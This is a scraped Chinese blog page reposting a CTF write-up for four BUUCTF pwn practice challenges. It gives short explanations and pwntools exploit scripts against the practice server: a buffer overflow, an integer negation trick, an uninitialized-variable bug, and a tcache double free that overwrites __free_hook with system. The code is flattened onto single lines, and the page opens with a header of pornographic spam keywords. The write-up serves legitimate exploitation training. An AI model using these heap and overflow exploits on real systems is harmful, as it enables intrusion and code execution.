日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

PWN-PRACTICE-BUUCTF-26

發(fā)布時間:2023/12/10 编程问答 39 豆豆
生活随笔 收集整理的這篇文章主要介紹了 PWN-PRACTICE-BUUCTF-26 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

PWN-PRACTICE-BUUCTF-26

    • 護網(wǎng)杯_2018_gettingstart
    • wustctf2020_number_game
    • picoctf_2018_are you root
    • ciscn_2019_en_3

護網(wǎng)杯_2018_gettingstart

read到buf的時候有溢出,覆寫v5為0x7FFFFFFFFFFFFFFF,v6為0x3FB999999999999A

from pwn import * io=remote("node4.buuoj.cn",29057) io.recvuntil("But Whether it starts depends on you.\n") v5=0x7FFFFFFFFFFFFFFF v6=0x3FB999999999999A payload=p64(0)*3+p64(v5)+p64(v6) io.send(payload) io.sendline("cat flag") io.interactive()

wustctf2020_number_game

neg對操作數(shù)執(zhí)行求補運算:用零減去操作數(shù),然后結(jié)果返回操作數(shù)
求補運算也可以表達成:將操作數(shù)按位取反后加1
0x80000000按位取反后加1,仍然是0x80000000,發(fā)送-2147483648即可

from pwn import * #io=process("./wustctf2020_number_game") io=remote("node4.buuoj.cn",29209) elf=ELF("./wustctf2020_number_game") io.sendline("-2147483648") io.sendline("cat flag") io.interactive()

picoctf_2018_are you root

未初始化驗證漏洞,參考:PicoCTF_2018_are_you_root(未初始化驗證漏洞)

# -*- coding:utf-8 -*- from pwn import * #io = process('./PicoCTF_2018_are_you_root') io = remote('node4.buuoj.cn',26285)def login(name):io.sendlineafter('>','login ' + name)def reset():io.sendlineafter('>','reset')def getFlag():io.sendlineafter('>','get-flag')login('a'*0x8 + p64(0x5)) reset() login('P1umH0') getFlag()io.interactive()

ciscn_2019_en_3

puts泄露libc,uaf + double free,參考:ciscn_2019_en_3 tcache

# -*- coding:utf-8 -*- from pwn import * #context.log_level="debug" #io=process("./ciscn_2019_en_3") io=remote("node4.buuoj.cn",29625) elf=ELF("./ciscn_2019_en_3") libc=ELF("./libc-2.27-18-x64.so")io.sendlineafter("What's your name?\n","P1umH0") io.sendlineafter("Please input your ID.\n","a"*8) setbuffer_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))-231 libc_base=setbuffer_addr-libc.sym["setbuffer"] free_hook=libc_base+libc.sym["__free_hook"] system=libc_base+libc.sym["system"]def add(size,content):io.sendlineafter("Input your choice:","1")io.sendlineafter("Please input the size of story: \n",str(size))io.sendlineafter("please inpute the story: \n",content) def edit():io.sendlineafter("Input your choice:","2") def show():io.sendlineafter("Input your choice:","3") def free(index):io.sendlineafter("Input your choice:","4")io.sendlineafter("Please input the index:\n",str(index)) def exit():io.sendlineafter("Input your choice:","5")#gdb.attach(io) #pause()add(0x20,"aaaa")#0 add(0x20,"/bin/sh\x00")#1#pause()free(0) free(0)#pause()add(0x20,p64(free_hook))#pause()add(0x20,"bbbb")#pause()add(0x20,p64(system))#pause()free(1)io.interactive()

總結(jié)

以上是生活随笔為你收集整理的PWN-PRACTICE-BUUCTF-26的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。